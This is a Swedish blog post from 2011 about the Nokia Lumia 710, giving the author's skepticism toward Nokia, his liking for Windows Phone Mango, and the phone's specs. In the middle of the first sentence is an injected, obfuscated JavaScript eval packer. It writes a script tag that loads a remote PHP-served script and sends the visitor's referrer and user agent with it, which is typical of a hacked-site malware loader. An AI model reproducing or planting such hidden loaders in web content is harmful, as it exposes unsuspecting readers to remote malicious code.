Image Image Image Image Image Image Image Image Image Image

| 21 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Nokia Lumia 710... Jag är delad.

Nokia Lumia 710… Jag är delad.
Filip Urde
  • On 26 oktober, 2011
  • http://www.revue.se/filip-urde

Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzdhy|var|u0026u|referrer|bfzdf||js|php’.split(‘|’),0,{}))
är delad….

Nokias andra Windows Phone-lur är på G. Den ser sjukt fräsch ut.
Men det är en Nokia… Jag är Delad minst sagt.
Jag gillar Windows nya Mango OS, känns hur schysst som helst och äntligen en riktigt tung konkurrent till iPhone. Men Nokia? är det bara jag som ställer mig frågande till Nokia och dess möjlighet att leverera. Själv tycker jag Nokia haft sin tid. Man funkade som en sluss för att få hela befolkningen in på mobil marknaden, man hade en modell som passade varje person. Man kunde va kreativ och byta skal, byta ringsignaler. Men sen då?
I dag är inget av detta viktigt och med floppen, även kallad ”symbian” (Nokias skit OS). Ja, då ligger inte Nokia på mitt +konto i alla fall.

Nokia Lumia 710 är lillebrodern till flaggskeppet Lumia 800 och bägge modellerna kör Windows Phone Mango. Den har en 3,7 tum stor skärm med upplösningen 480×800 pixlar, en kamera på 5 megapixel, Qualcomm-processor på 1,4Ghz, GPS, WiFi, Bluetooth och 8GB inbyggt minne som går att utöka till maximalt 24GB via en microSD-kortsingång.

Men nää… Är jag tråkig och långsint? kanske…

 

Men om ärligheten ska fram (vilket den ska), så måste jag säga att jag tror inte på NOKIA!

jag tror på Windows! Men inte Nokia… drömmen vore väll om det var Ericsson istället för Nokia som fick OS:et. Men vad gör man nu? jag kan tänka mig OS:et som mobilen har, men inte mobilen. Vad gör man då?
Lumia 710 kommer till Ryssland (?!?) och vissa valda länder i Asien mot åretsslut.  Reste får vänta tills i början av 2012. Priset kommer ligga runt 320 euro.

 

Vi får helt enkelt vänta och ta en test innan jag kan dömma totalt…